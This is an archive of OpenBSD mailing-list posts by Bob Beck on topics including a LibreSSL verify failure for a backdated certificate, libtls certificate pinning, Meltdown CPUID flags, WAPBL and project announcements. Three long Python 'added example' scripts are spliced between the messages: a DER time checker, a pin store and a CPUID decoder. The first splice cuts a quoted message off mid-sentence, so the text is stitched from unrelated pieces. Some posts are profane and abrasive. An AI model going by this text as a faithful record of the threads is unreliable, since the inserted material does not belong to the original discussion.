Re: Libressl verify failure with 3.9.0

2024-04-08 Thread Bob Beck



> On Apr 8, 2024, at 5:44 AM, Theo Buehler  wrote:
> 
> On Sun, Apr 07, 2024 at 04:57:24PM -0500, Ted Wynnychenko wrote:
>> Hello,
>> 
>> I recently updated to -current (about a week ago).
>> 
>> I see that Libressl is at 3.9.1 just now, but I hope that won't be an issue 
>> (I did not see anything in the release notes that would impact my question).
>> ---
>> $ openssl version
>> LibreSSL 3.9.0
>> ---
>> 
>> Over the years, I have made certificates for personal servers/resources on 
>> my home network.  This is just for me, so I do some things that would be 
>> frowned on (although, technically, there is nothing "wrong" with them).
>> 
>> In this case, since I have Apple iOS devices that I want to connect to 
>> https, I backdate any certificates I create to 1/2/2019.  Apple has imposed 
>> a 300 or 800 day time limit on the validity for certificates created after 
>> (about) 7/1/2019.  Since I don't want to constantly make new certificates 
>> for my personal/home network, I have just been setting the certificates' 
>> "not before" date to early 2019.
>> 
>> Anyway, this had worked fine.
>> In fact, earlier this year (Jan 2024), I created a new certificate, and all 
>> is good.
>> 
>> A few weeks ago, I added a new thing to the network - a raspberry pi (I got 
>> as a gift about 2013 and installed a linux image from 2019 on it) that is 
>> connected to the home alarm system.
>> 
>> Since I was annoyed that my browser was constantly giving me self-signed 
>> certificate warnings, I decided to make a certificate for the nginx running 
>> on this appliance.
>> 
>> I created a key, made a csr, and then signed it with:
>> openssl ca -startdate 20190102000000Z -in pi.csr -out pi.pem -config /etc/ssl/openssl.cnf


Did you create this certificate on OpenBSD with Libressl openssl? Or on linux 
or something else with an OpenSSL openssl? 


> 
> As a workaround, try using '-startdate 190102000000Z' instead. I think
> this is fallout from this commit:
> 
> https://github.com/openbsd/src/commit/3feee4c53fbd67a4a480080d8ef5ae835d3fbf82
> 
> ASN1_TIME_set_string_X509() is documented as
> 
> In LibreSSL, ASN1_TIME_set_string() and ASN1_TIME_set_string_X509()
> behave identically and always set the time object to a valid value to use
> in an X.509 certificate.
> 
> It seems to me that this is just wrong (it is true that both behave
> identically because RFC5280 is defined to 0), but they do not set the
> time object to "a valid value to use in an X.509 certificate".
> 
> Confusingly, ASN1_TIME_adj_internal() actually honours its RFC5280
> parameter by behaving the expected way whereas its meaning in
> ASN1_TIME_set_string_internal() is different.
> 
> I am unsure if the bug is in my commit above or in our version of
> ASN1_TIME_set_string_X509() (or both).

> 
>> 
>> This all works fine, and a certificate is created
>> 
>> When I check with:
>> openssl x509 -text -noout -in pi.pem
>> 
>> everything seems as expected, including the not before/after dates:
>> 
>>Validity
>>Not Before: Jan  2 00:00:00 2019 GMT
>>Not After : Apr  7 15:39:59 2054 GMT
>> 
>> (yes, it is valid for 35 years - as I said before, if someone breaks into my 
>> house to secretly do things, I have way bigger problems)
>> 
>> But, if I try to verify this on the openbsd system, I get:
>> 
>> # openssl verify pi.pem
>> C = US, ST = Illinois, L = ***, O = ***, OU = ***, CN = ***
>> error 20 at 0 depth lookup:unable to get local issuer certificate
>> pi.pem: verification failed: 20 (unable to get local issuer certificate)
>> ---
>> 
>> But, if I install this on the raspberry pi, which has a much older version 
>> of openssl on it:
>> $ openssl version
>> OpenSSL 1.1.1c  28 May 2019
>> 
>> The certificate verifies without an issue:
>> $ openssl verify pi.pem
>> pi.pem: OK
>> 
>> The last time I created a certificate was in January of this year 
>> (1/22/2024).
>> I am thinking the openbsd system was using Libressl 3.8.2 at that point.
>> 
>> I created that certificate in the exact same way, backdating the start date:
>> openssl ca -startdate 20190102000000Z -in 54.csr -out 54.pem -config /etc/ssl/openssl.cnf
>> 
>> This previously created certificate also has them same backdated and very 
>> long valid period:
>> 
>>Validity
>>Not Before: Jan  2 00:00:00 2019 GMT
>>Not After : Jan 21 23:49:22 2054 GMT
>> 
>> (Notice the not after date is a little different)
>> Today, with the new libressl, this certificate verifies OK.
>> 
>> $ openssl verify 54.pem
>> 54.pem: OK
>> 
>> Finally, if I create the new certificate WITHOUT backdating it
>> e.g.:  openssl ca -in pi.csr -out pi.pem -config /etc/ssl/openssl.cnf
>> 
>> The certificate is created and verifies OK.
>> 
>> So, it seems, there is some sort of issue with backdating the certificate, 
>> but not an issue with the crazy long validity window, that was not present 
>> in January of this year.
>> 
>> However, as I said, if I 
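As an added example (not code from this thread, from LibreSSL or from OpenSSL), here is the first check a practitioner would run on a certificate that verifies under one toolkit and fails under another: how the Validity times are encoded. RFC 5280 §4.1.2.5 requires dates through 2049 to be UTCTime (tag 0x17) and dates in 2050 or later to be GeneralizedTime (tag 0x18); a validator that enforces that rule treats a time encoded the other way round as an error, which is exactly the kind of difference that shows up between an old OpenSSL and a current LibreSSL. The script is a minimal DER walker using only the standard library. The two Validity sequences at the bottom are constructed here from the dates in the thread, one encoded correctly and one with notBefore wrongly written as GeneralizedTime; on a real certificate feed it the output of `openssl x509 -in pi.pem -outform DER`.

```python
"""Check that every UTCTime/GeneralizedTime in a DER blob follows RFC 5280:
years through 2049 as UTCTime (0x17), 2050 and later as GeneralizedTime (0x18).
Pure stdlib; walks nested SEQUENCE/SET values, so a whole certificate can be
passed in (its two Validity fields are then the times found)."""
from datetime import datetime, timezone

UTCTIME, GENTIME = 0x17, 0x18

def _read_tlv(buf, pos):
    """Parse one DER TLV header at pos; return (tag, constructed, value_start, value_end)."""
    tag = buf[pos]
    if tag & 0x1f == 0x1f:               # high-tag-number form: never used in X.509
        raise ValueError("unsupported tag form")
    constructed = bool(tag & 0x20)
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:                     # long form: next n bytes hold the length
        nbytes = length & 0x7f
        if nbytes == 0 or nbytes > 4:
            raise ValueError("indefinite or oversized length is not DER")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    end = pos + length
    if end > len(buf):
        raise ValueError("length runs past end of buffer")
    return tag, constructed, pos, end

def iter_times(buf, pos=0, end=None):
    """Yield (offset, tag, text) for every time value, descending into constructed types."""
    end = len(buf) if end is None else end
    while pos < end:
        tag, constructed, vstart, vend = _read_tlv(buf, pos)
        if constructed:
            yield from iter_times(buf, vstart, vend)
        elif tag in (UTCTIME, GENTIME):
            yield pos, tag, buf[vstart:vend].decode("ascii")
        pos = vend

def decode_time(tag, text):
    """Decode per RFC 5280: UTCTime YYMMDDHHMMSSZ (YY >= 50 is 19YY, else 20YY),
    GeneralizedTime YYYYMMDDHHMMSSZ. Offsets and fractional seconds are not DER."""
    if not text.endswith("Z"):
        raise ValueError(f"non-Zulu time {text!r} is not allowed in certificates")
    if tag == UTCTIME:
        if len(text) != 13:
            raise ValueError(f"bad UTCTime {text!r}")
        yy = int(text[:2])
        year, rest = (1900 + yy if yy >= 50 else 2000 + yy), text[2:-1]
    else:
        if len(text) != 15:
            raise ValueError(f"bad GeneralizedTime {text!r}")
        year, rest = int(text[:4]), text[4:-1]
    return datetime(year, int(rest[0:2]), int(rest[2:4]), int(rest[4:6]),
                    int(rest[6:8]), int(rest[8:10]), tzinfo=timezone.utc)

def check_time_encodings(der):
    """Return [(offset, datetime, problem_or_None)] for each time value in der."""
    report = []
    for off, tag, text in iter_times(der):
        when = decode_time(tag, text)
        if when.year < 2050 and tag != UTCTIME:
            problem = "year < 2050 must be UTCTime, got GeneralizedTime"
        elif when.year >= 2050 and tag != GENTIME:
            problem = "year >= 2050 must be GeneralizedTime, got UTCTime"
        else:
            problem = None
        report.append((off, when, problem))
    return report

def der_time(tag, text):
    """Constructed-sample helper: wrap an ASCII time string in a short-form TLV."""
    body = text.encode("ascii")
    return bytes([tag, len(body)]) + body

def der_seq(*items):
    """Constructed-sample helper: SEQUENCE of items (bodies under 128 bytes only)."""
    body = b"".join(items)
    return bytes([0x30, len(body)]) + body

# Constructed Validity sequences using the thread's dates (not from a real certificate):
# the correct encoding, then the same notBefore mis-encoded as GeneralizedTime.
GOOD_VALIDITY = der_seq(der_time(UTCTIME, "190102000000Z"),
                        der_time(GENTIME, "20540407153959Z"))
BAD_VALIDITY = der_seq(der_time(GENTIME, "20190102000000Z"),
                       der_time(GENTIME, "20540407153959Z"))

if __name__ == "__main__":
    for name, blob in (("good", GOOD_VALIDITY), ("bad", BAD_VALIDITY)):
        for off, when, problem in check_time_encodings(blob):
            print(f"{name}: offset {off}: {when.isoformat()} {problem or 'ok'}")
```

`openssl asn1parse -in pi.pem` shows the same tags by name (UTCTIME versus GENERALIZEDTIME), so the two views can be compared side by side; the script adds the year rule on top.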

Re: ssl/libssl certificate validation broken?

2020-10-20 Thread Bob Beck
On 20 Oct 21:01, Uwe Werler wrote:
> Hi folks,
> 
> before opening a bug report I'll ask here because I want to make sure that I
> have not missed something.

You should probably submit a real bug report instead of jumping to 
conclusions on misc@

> 
> With the upgrade to 6.8 my cert validation seems to be broken because the
> hashed certs in /etc/ssl/certs are not honored anymore. I usually stored our
> L1 and L2 ca certs in /etc/ssl/certs and hashed them with "openssl certhash".
> That worked for all my machines until 6.7 but broke with 6.8. Adding the ca
> certs to /etc/ssl/cert.pem works.
> 
> Did I miss something? I guess something changed during k2k20 in "certificate
> chain validation in libcrypto"?
> 
> Thanks and with kind regards.
> 
> Uwe
> 
...
>Mmh, it seems to me that libssl is broken. After the upgrade to 6.8 my
>openldap proxies were screwed too. I configured explicitely
>
>olcTLSCACertificatePath: /etc/ssl/certs
>
>But that broke so I had to change to:

"Broke".. how?


>olcTLSCACertificateFile: /etc/ssl/cert.pem
>
>... and I had to change also /etc/openldap/ldap.conf from:
>
>TLS_CACERTDIR /etc/ssl/certs
>
>to
>
>TLS_CACERT /etc/ssl/cert.pem
>
>to keep syncrepl running.

You are a little bit thin on details here. The changes in the validator
should not affect the loading of your certificates. 

Are you using openldap from packages or something else?

So please pass on some details and perhaps a succinct way to reproduce
and include the error messages you see. Probably as a real bug report
instead of misc discussions.



Re: TOFU/cert pinning in libtls

2020-05-09 Thread Bob Beck


On Sat, May 09, 2020 at 06:18:50PM +0000, Lucas wrote:
> Hello Stephen,
> 
> > My basic idea for the client is:
> > 
> > - load a db of self-signed certs.
> > - connect to host
> > - if host cert is self signed
> >   - if not in db, prompt user and add to db
> >   - if in db, check fingerprint and warn user if they don't match.
> > 
> > Browsing the manuals/source code, there doesn't seem to be an easy way
> > to configure this. I don't want to have to use the OpenSSL API for this
> > :(.
> 
> I experimented with cert FP pinning in the past, too. tls_peer_cert_hash
> is probably what you're looking for. Found it looking at
> /usr/include/tls.h. Then tried to find it referenced in other manpages,
> 
> oolong$ man -k Xr=tls_peer_cert_hash 
> nc(1) - arbitrary TCP and UDP connections and listens
> 
> That's far from ideal IMO, but I don't know where, of the many tls_*
> manpages, would I reference it.

man tls_peer_cert_hash

happily brings up the man page on my machines. 
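The trust-on-first-use flow sketched above, as an added example that is not part of the thread or of libtls. A libtls client gets the peer's fingerprint from tls_peer_cert_hash() as the string "SHA256:<hex of SHA-256 over the DER certificate>", and libtls_style_hash() below produces the same string from raw DER so the store can be exercised without a live connection. The class and function names (PinStore, connect_policy) are this example's own; the "self-signed only" condition from the original design is left out, so every peer certificate is pinned. The two sample "certificates" are constructed byte strings, not real DER.

```python
"""Trust-on-first-use pin store for a TLS client: remember the peer's
certificate fingerprint on first contact, insist it never changes afterwards,
and never silently replace it on a mismatch."""
import hashlib
import hmac
import json
import os

def libtls_style_hash(cert_der: bytes) -> str:
    """Fingerprint in the shape tls_peer_cert_hash() returns: "SHA256:" + hex digest."""
    return "SHA256:" + hashlib.sha256(cert_der).hexdigest()

class PinStore:
    FIRST_SEEN, MATCH, MISMATCH = "first-seen", "match", "mismatch"

    def __init__(self, path=None):
        """path=None keeps the pins in memory only; otherwise they live in a JSON file."""
        self.path = path
        self.pins = {}
        if path and os.path.exists(path):
            with open(path) as f:
                self.pins = json.load(f)

    @staticmethod
    def _key(host, port):
        return f"{host}:{port}"

    def _save(self):
        if not self.path:
            return
        tmp = self.path + ".tmp"
        with open(tmp, "w") as f:
            json.dump(self.pins, f, indent=1, sort_keys=True)
        os.replace(tmp, self.path)  # atomic rename: a crash never leaves a half-written db

    def check(self, host, port, fingerprint):
        """Classify a connection without changing the store."""
        pinned = self.pins.get(self._key(host, port))
        if pinned is None:
            return self.FIRST_SEEN
        # constant-time compare; both strings are ASCII hex
        return self.MATCH if hmac.compare_digest(pinned, fingerprint) else self.MISMATCH

    def pin(self, host, port, fingerprint):
        self.pins[self._key(host, port)] = fingerprint
        self._save()

    def forget(self, host, port):
        """The only way a pinned fingerprint goes away: an explicit, deliberate call."""
        self.pins.pop(self._key(host, port), None)
        self._save()

def connect_policy(store, host, port, fingerprint, prompt=lambda fp: True):
    """Proceed on match; ask the user (prompt) on first contact and pin if accepted;
    refuse on mismatch. Returns True when the connection may continue."""
    result = store.check(host, port, fingerprint)
    if result == PinStore.MATCH:
        return True
    if result == PinStore.FIRST_SEEN:
        if prompt(fingerprint):
            store.pin(host, port, fingerprint)
            return True
        return False
    return False  # MISMATCH: the pinned key changed, do not talk to this peer

# Constructed sample "certificates": any distinct bytes exercise the fingerprint logic.
CERT_A = b"constructed DER stand-in for alarm.home.example, key 1"
CERT_B = b"constructed DER stand-in for alarm.home.example, key 2"

if __name__ == "__main__":
    store = PinStore()  # in-memory
    host, port = "alarm.home.example", 443
    print(connect_policy(store, host, port, libtls_style_hash(CERT_A)))  # first contact, pinned
    print(connect_policy(store, host, port, libtls_style_hash(CERT_A)))  # same cert: allowed
    print(connect_policy(store, host, port, libtls_style_hash(CERT_B)))  # cert changed: refused
```

In a C libtls client the same decision sits after tls_handshake(): configure the context with tls_config_insecure_noverifycert() so libtls does not reject the self-signed certificate itself, then hand the string from tls_peer_cert_hash() to the store and close the connection on a mismatch.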






Re: Suggestion: Replace Perl with Lua in the OpenBSD Base System

2019-12-31 Thread Bob Beck
read fucking code.  change fucking things. send some fucking diffs. get
fucking yelled at. learn from your fucking mistakes.  show some fucking
passion.  filter fucking misc@ and all this useless bleating into the
toilet.

none of us have time to spoon feed you in some “boot camp”

there are two types of programmers. the self taught, and the hopeless. it
is your job to turn yourself from the hopeless to the self taught.

shut up and fucking hack.


On Tue, Dec 31, 2019 at 23:50 Frank Beuth  wrote:

> On Wed, Jan 01, 2020 at 04:00:37AM +0000, e...@isdaq.com wrote:
> >rather than the programmer being responsible for
> >writing unsafe
> >code we need to regulate what the programmer can do just like we need to
> >regulate what the community can say, do, see, and think.
>
> where do I sign up for OpenBSD write-perfect-C-code programmer training
> bootcamp?
>
>


Re: bug tracking system for OpenBSD

2018-04-01 Thread Bob Beck
Christoph, your conversation is distracting.

Nobody gives a damn about the tool. Everyone gives a damn about the triage.

I hate to break it to you, but you are not the first person to broach
this discussion.

The only way this would work is with a dedicated team of people to
triage each area and clean it up constantly.

No such team exists.  the tool used is irrelevant


On Sun, Apr 1, 2018 at 9:44 AM, Christoph R. Murauer  wrote:
> My question was serious. I am not the enemy but I think this thing
> will only work if the people who use it accept / like to use it and so
> on.
>
>> bug tracking software is 1% of the solution.  At least 80% of the
> work is triage, and no one on this thread is serious about doing
> that.
>
>



Re: Meltdown workaround enabled?

2018-03-14 Thread Bob Beck
On Wed, Mar 14, 2018 at 05:38 Robert Paschedag <robert.pasche...@web.de>
wrote:

>
> > Gesendet: Mittwoch, 14. März 2018 um 06:13 Uhr
> > Von: "Bob Beck" <b...@obtuse.com>
> > An: "Brian Camp" <br...@thecamps.org>
> > Cc: "Theo de Raadt" <dera...@openbsd.org>, misc@openbsd.org
> > Betreff: Re: Meltdown workaround enabled?
> >
> > Intel make kitty scared...  What a fuckmess.
>
> Err... do I get it right, that a possibly vulnerable CPU
> (from 2016) is still vulnerable to MELTDOWN but a newer
> BIOS *fakes* the CPU flags so the MELTDOWN "detection code"
> says, "this CPU is NOT vulnerable"
>
> Is that right?
>
> Robert
>


Just consume the broken crap like a good citizen.  Intel is too big to fail
so thinking about these things is bad for society. Right?



> >
> > On Tue, Mar 13, 2018 at 22:57 Brian Camp <br...@thecamps.org> wrote:
> >
> > > On Tue, Mar 13, 2018 at 10:39 PM, Theo de Raadt <dera...@openbsd.org>
> > > wrote:
> > > >> According to some sources, Intel and a handful of others have known
> > > about the
> > > >> issue since February 2017(!), so perhaps it has already been
> patched in
> > > the
> > > >> 08Jan2018 BIOS. I too have doubts that to date any processor has
> been
> > > >> redesigned to avoid the flaws entirely, but then again...
> > > >
> > > > Sure.  A BIOS can change the flag bits.
> > > >
> > > > Be nice to know.  Did a BIOS change them?
> > >
> > > I downgraded the bios to try and figure this out. Going back just one
> > > revision (1/8/2018 to 12/18/2017) causes it to lose the flag and
> > > -current's MELTDOWN workaround to activate.
> > >
> > > Previous BIOS revision (12/18/2017):
> > > bcamp@nuc6cayh:~ (OpenBSD 6.3)
> > > $ cpuid 0x7
> > > eax = 0x00000000 0""
> > > ebx = 0x2294e283 580182659"???""
> > > ecx = 0x00000000 0""
> > > edx = 0x00000000 0""
> > >
> > > Newest BIOS revision (1/8/2018):
> > > bcamp@nuc6cayh:~ (OpenBSD 6.3)
> > > $  cpuid 0x7
> > > eax = 0x00000000 0""
> > > ebx = 0x2294e283 580182659"???""
> > > ecx = 0x00000000 0""
> > > edx = 0x2c000000 738197504"???,"
> > >
> > >
> >
>
>
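An added example (not OpenBSD kernel code) that decodes the two edx values posted above. The cpuid 0x7 edx register is CPUID.(EAX=7,ECX=0):EDX; the bit names follow the Intel SDM. The decoder shows what the newer BIOS exposes that the older one did not, and meltdown_verdict() spells out the generic two-step logic an OS applies: the CPUID bit only says the IA32_ARCH_CAPABILITIES MSR exists, and the claim of not being vulnerable is the RDCL_NO bit inside that MSR, which only the kernel can read. Whether that claim is honest is not something the registers can tell you. The MSR value at the end is constructed, not from the thread.

```python
"""Decode and diff CPUID.(EAX=7,ECX=0):EDX, the leaf the Meltdown/Spectre
microcode updates extended, and state what an OS can conclude from it."""

# CPUID leaf 7, sub-leaf 0, EDX (Intel SDM vol. 2, CPUID)
LEAF7_EDX_BITS = {
    26: "IBRS_IBPB",          # indirect branch restricted speculation / prediction barrier
    27: "STIBP",              # single-thread indirect branch predictors
    28: "L1D_FLUSH",          # IA32_FLUSH_CMD MSR present
    29: "ARCH_CAPABILITIES",  # IA32_ARCH_CAPABILITIES MSR (0x10a) present
    30: "CORE_CAPABILITIES",
    31: "SSBD",               # speculative store bypass disable
}

# IA32_ARCH_CAPABILITIES MSR (0x10a); readable only with rdmsr from ring 0
ARCH_CAP_BITS = {
    0: "RDCL_NO",             # not susceptible to rogue data cache load (Meltdown)
    1: "IBRS_ALL",            # enhanced IBRS
    2: "RSBA",                # return stack buffer may fall back to the BTB
    3: "SKIP_L1DFL_VMENTRY",
    4: "SSB_NO",
}

def decode(value, table):
    """Names of the known bits set in value."""
    return {name for bit, name in table.items() if (value >> bit) & 1}

def unknown_bits(value, table):
    """Set bits the table has no name for: look them up before trusting a diff."""
    return {bit for bit in range(32) if (value >> bit) & 1 and bit not in table}

def diff_features(old, new, table=LEAF7_EDX_BITS):
    """(gained, lost) feature names between two readings, e.g. two BIOS revisions."""
    before, after = decode(old, table), decode(new, table)
    return after - before, before - after

def meltdown_verdict(leaf7_edx, arch_cap_msr=None):
    """Generic OS logic: CPUID says whether the MSR exists; the MSR's RDCL_NO bit
    is the CPU/microcode's own claim. Pass arch_cap_msr=None when it was not read."""
    if "ARCH_CAPABILITIES" not in decode(leaf7_edx, LEAF7_EDX_BITS):
        return "no IA32_ARCH_CAPABILITIES: assume vulnerable, keep the workaround on"
    if arch_cap_msr is None:
        return "IA32_ARCH_CAPABILITIES advertised but not read: no conclusion"
    if "RDCL_NO" in decode(arch_cap_msr, ARCH_CAP_BITS):
        return "RDCL_NO set: CPU/microcode claims not vulnerable to Meltdown"
    return "RDCL_NO clear: vulnerable, keep the workaround on"

# edx values posted in the thread (cpuid 0x7) for the two BIOS revisions
OLD_BIOS_EDX = 0x00000000   # 12/18/2017
NEW_BIOS_EDX = 0x2c000000   # 1/8/2018

if __name__ == "__main__":
    gained, lost = diff_features(OLD_BIOS_EDX, NEW_BIOS_EDX)
    print("gained:", sorted(gained), "lost:", sorted(lost))
    print("unknown bits:", unknown_bits(NEW_BIOS_EDX, LEAF7_EDX_BITS))
    print("old BIOS:", meltdown_verdict(OLD_BIOS_EDX))
    print("new BIOS:", meltdown_verdict(NEW_BIOS_EDX))
    # Constructed MSR value (not from the thread): only RDCL_NO set.
    print("new BIOS + MSR 0x1:", meltdown_verdict(NEW_BIOS_EDX, arch_cap_msr=0x1))
```

On the posted values the newer BIOS gains IBRS_IBPB, STIBP and ARCH_CAPABILITIES and nothing is lost; the next thing to check on such a box is the MSR itself, which needs ring 0.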


Re: Meltdown workaround enabled?

2018-03-13 Thread Bob Beck
Intel make kitty scared...  What a fuckmess.

On Tue, Mar 13, 2018 at 22:57 Brian Camp  wrote:

> On Tue, Mar 13, 2018 at 10:39 PM, Theo de Raadt 
> wrote:
> >> According to some sources, Intel and a handful of others have known
> about the
> >> issue since February 2017(!), so perhaps it has already been patched in
> the
> >> 08Jan2018 BIOS. I too have doubts that to date any processor has been
> >> redesigned to avoid the flaws entirely, but then again...
> >
> > Sure.  A BIOS can change the flag bits.
> >
> > Be nice to know.  Did a BIOS change them?
>
> I downgraded the bios to try and figure this out. Going back just one
> revision (1/8/2018 to 12/18/2017) causes it to lose the flag and
> -current's MELTDOWN workaround to activate.
>
> Previous BIOS revision (12/18/2017):
> bcamp@nuc6cayh:~ (OpenBSD 6.3)
> $ cpuid 0x7
> eax = 0x00000000 0""
> ebx = 0x2294e283 580182659"???""
> ecx = 0x00000000 0""
> edx = 0x00000000 0""
>
> Newest BIOS revision (1/8/2018):
> bcamp@nuc6cayh:~ (OpenBSD 6.3)
> $  cpuid 0x7
> eax = 0x00000000 0""
> ebx = 0x2294e283 580182659"???""
> ecx = 0x00000000 0""
> edx = 0x2c000000 738197504"???,"
>
>


Official OpenBSD 6.2 CD set up for auction on Ebay

2017-11-18 Thread Bob Beck
So, the only 6.2 set to be produced is up for auction, featuring hand-drawn
artwork by Theo.

Artisanally Made in Canada!

All proceeds of the sale to fund OpenBSD development.

Go have a look at
http://www.ebay.ca/itm/Official-OpenBSD-6-2-CD-Set/253265944606


Official OpenBSD 6.1 CD !

2017-05-03 Thread Bob Beck
So.  There *Is* an official OpenBSD 6.1 CD

Just One.

If you are interested, please bid on ebay :

http://www.ebay.com/itm/The-only-Official-OpenBSD-6-1-CD-set-to-be-made-For-auction-for-the-project-/252910718452?hash=item3ae2a74df4:g:SJQAAOSwrhBZBqkd

(It's a pretty cool little CD set!)


Re: Why isn't OpenBSD in Google Summer of Code 2017?...

2017-04-02 Thread Bob Beck
We tried it for two years, it was too much effort on the part of the
foundation organizers and mentors to deal with the bureaucracy involved, and
we didn't really see enough return in terms of new developers to the
project, which, frankly, being selfish on OpenBSD's part, is the only
reason for us to do it.

Both Ken Westerback and I organized our end of it and dealt with the google
paperwork the two years we did it. Neither of us is willing to do it again,
and while I won't directly speak for Ken, I would not support us spending
effort on this when there are lots of other things to do. It just doesn't
have the benefit for OpenBSD, especially in light of the effort of the
volunteers necessary to participate.



On Sun, Apr 2, 2017 at 8:54 AM, Luke Small  wrote:



Re: white noise about broken manpage (web) links

2016-05-11 Thread Bob Beck
You need to complain at reyk - since these web pages are not in the
openbsd www/ tree they didn't get fixed when we converted to
man.openbsd.org

On Tue, May 10, 2016 at 10:52 PM, Vivek Vinod  wrote:
> Dear Misc,
>
> I could not find a separate mailing list for openiked. Hence posting here.
>
> web manpage links appear to be broken on:
> 1) http://www.openiked.org/
> 2) http://www.openiked.org/manual.html
>
> The referenced links are
> 1A) http://www.openbsd.org/cgi-bin/man.cgi?query=isakmpd
>
> 2A) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man8/iked.8
> 2B) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man5/iked.conf.5
> 2C) http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man8/ikectl.8
>
> I get a "500 Internal server error... OpenBSD httpd"
>
> Unrelated - I have gotten the same error when clicking links on 3rd
> party websites like daemonforums.org
>
> I promise to submit diffs when I am more confident of submitting them.
>
> Please ignore if trivial.
>
> Vivek



Re: ftp/www.openbsd.org will be down for an upgrade today.

2016-05-09 Thread Bob Beck
it has been back for quite some time


On Mon, May 9, 2016 at 1:02 PM, Markus Rosjat <ros...@ghweb.de> wrote:
> Hi there,
>
> just a short question about the site coming up again.
> Since our spamd-setup tries to get some blacklists form the site I was
> wondering if there is any info about the the time schedule for the
> maintenance?
>
> Regards
>
> Markus
>
>
> Am 08.05.2016 um 23:44 schrieb Stefan Wollny:
>>
>> Am 05/08/16 um 20:03 schrieb Bob Beck:
>>>
>>> There will be an extended downtime of the main ftp and www sites for
>>> an upgrade today starting in approximately one hour's time from now.
>>>
>>> The mirror sites should be unaffected - so use a mirror if you
>>> discover the main site is unavailable today.
>>>
>> Anyone know of an up2date mirror of 'current.html'?
>> (Google just found one with the latest entries from 2005...)
>> :-(
>>
>> TIA.
>>
>> STEFAN
>>
>
> --
> Markus Rosjat    fon: +49 351 8107223    mail: ros...@ghweb.de
>
> G+H Webservice GbR Gorzolla, Herrmann
> Königsbrücker Str. 70, 01099 Dresden
>
> http://www.ghweb.de
> fon: +49 351 8107220   fax: +49 351 8107227
>
> Please check whether this mail really needs to be printed! Before you
> print it, think about your responsibility and commitment to the ENVIRONMENT



Re: TLS now supported on openbsd.org?

2016-05-09 Thread Bob Beck
>It's great to see OpenBSD Project supporting Let's Encrypt.

I am absolutely not supporting Let's Encrypt. The client scares the shit
out of me, and shows me how low the bar has become. Considering all I need
is put something on a web site that I can convince a DNS server is the one
they'll check, well, that's pretty darn bad - you'd all probably be a lot
better off pinning self-signed certs.


> It is really nice to finally see TLS on openbsd.org. How about redirecting
> http to https?

And statements like this - and people that think this is a good idea,
are why I spoof DNS answers in bars and coffee shops, and why I don't
read misc@.  This is never a good idea, unless you want the
connections intercepted and MITM'ed.



ftp/www.openbsd.org will be down for an upgrade today.

2016-05-08 Thread Bob Beck
There will be an extended downtime of the main ftp and www sites for
an upgrade today starting in approximately one hour's time from now.

The mirror sites should be unaffected - so use a mirror if you
discover the main site is unavailable today.

Thanks
-Bob



Re: WAPBL?

2016-04-01 Thread Bob Beck
I would hazard a guess that if you are running a random diff, the
problem is with the diff you are running - not those other things.

On Fri, Apr 1, 2016 at 9:30 AM, Amit Kulkarni <amitk...@gmail.com> wrote:
> I see the writes are not being done to disk in case of a simple cvs update,
> and the machine locks up for a solid couple of minutes afterwards also. This
> happens in a dual CPU config with plenty of free memory, even with stefan,
> mpi and kettenis recent diffs. For a curious kernel reader, where could the
> bug(s) be? in amap, uvm/buffer cache, rthreads???
>
> Thanks in advance
>
>
> On Fri, Apr 1, 2016 at 9:06 AM, Bob Beck <b...@obtuse.com> wrote:
>>
>> I have more up to date versions of these patches around here.
>>
>> The problem with them is that fundamentally, the WAPBL implementation
>> as it is assumes that it may infinitely steal
>> buffers from the buffer cache and hold onto them indefinitely - and it
>> assumes it can always get buffers from it. While the patch as it sits
>> may "work" in the "happy case" on many people's machines, as it sits
>> today it is dangerous and can lock up your machine and corrupt things
>> in low memory situations.
>>
>> Basically in order to progress WAPBL (renamed "FFS Journalling" here)
>> needs to have a mechanism added to allow
>> it be told "no it can't have a buffer" and let it deal with it
>> correctly.  The first part is done, the latter part is complex.
>>
>>
>> On Sat, Mar 26, 2016 at 1:27 PM, Martijn Rijkeboer <mart...@bunix.org>
>> wrote:
>> > Hi,
>> >
>> > Just out of curiosity, what has happened with WAPBL? There were some
>> > patches
>> > floating around on tech@ in the last months of 2015, but then it became
>> > quiet. I'm not complaining just curious.
>> >
>> > Kind regards,
>> >
>> >
>> > Martijn Rijkeboer



Re: WAPBL?

2016-04-01 Thread Bob Beck
I have more up to date versions of these patches around here.

The problem with them is that fundamentally, the WAPBL implementation
as it is assumes that it may infinitely steal
buffers from the buffer cache and hold onto them indefinitely - and it
assumes it can always get buffers from it. While the patch as it sits
may "work" in the "happy case" on many people's machines, as it sits
today it is dangerous and can lock up your machine and corrupt things
in low memory situations.

Basically in order to progress WAPBL (renamed "FFS Journalling" here)
needs to have a mechanism added to allow
it be told "no it can't have a buffer" and let it deal with it
correctly.  The first part is done, the latter part is complex.


On Sat, Mar 26, 2016 at 1:27 PM, Martijn Rijkeboer  wrote:
> Hi,
>
> Just out of curiosity, what has happened with WAPBL? There were some patches
> floating around on tech@ in the last months of 2015, but then it became
> quiet. I'm not complaining just curious.
>
> Kind regards,
>
>
> Martijn Rijkeboer



But wait, there's more.. another 5.8 song!

2015-09-01 Thread Bob Beck
Coming soon to http://www.openbsd.org/lyrics.html is the next 5.8
release song "A Year In The Life".

I seem to have this bad habit of talking to Theo about release
themes when drinking alcohol, and it brings out the poet (My
inner Weird Al) in me.   Then I get cajoled into finishing the Opus
before release time.

We've done stuff about LibreSSL before, but this particular song just
fit with the release theme. While the lyrics can speak for themselves,
"A Year In The Life" is representative of more than just LibreSSL. The
pattern of LibreSSL development is a pattern that has repeated itself
many times in OpenBSD -- a decision is made by a few people to do
something, followed by action, and letting the world share it if they
like it (such as with OpenSSH). To the developers actually doing the
work, reactions to such efforts can often seem surreal, or
irrelevant. The juxtaposition of working on the very real with the
surreal going on around you can often make working on such projects
feel like you're in a bit of an altered reality..  Sort of like the
song. A number of us have had many years like this in the last 20.


Anyhow, please enjoy

-Bob



BitCoin donations to the OpenBSD Foundation.

2015-07-09 Thread Bob Beck
We've recently noticed a few attempts at larger Bitcoin donations to
the OpenBSD Foundation.

Due to the nature of these, we don't actually know who is attempting
to donate, so I'm posting here.

Due to changing laws, our provider (BitPay) had to limit transactions
to $1000/day causing these donations to fail (according to what we
received from BitPay the potential donor would have been told this).

As of a few hours ago, we have managed to get the limit raised to
$10000/day - and a note of this
is now reflected at

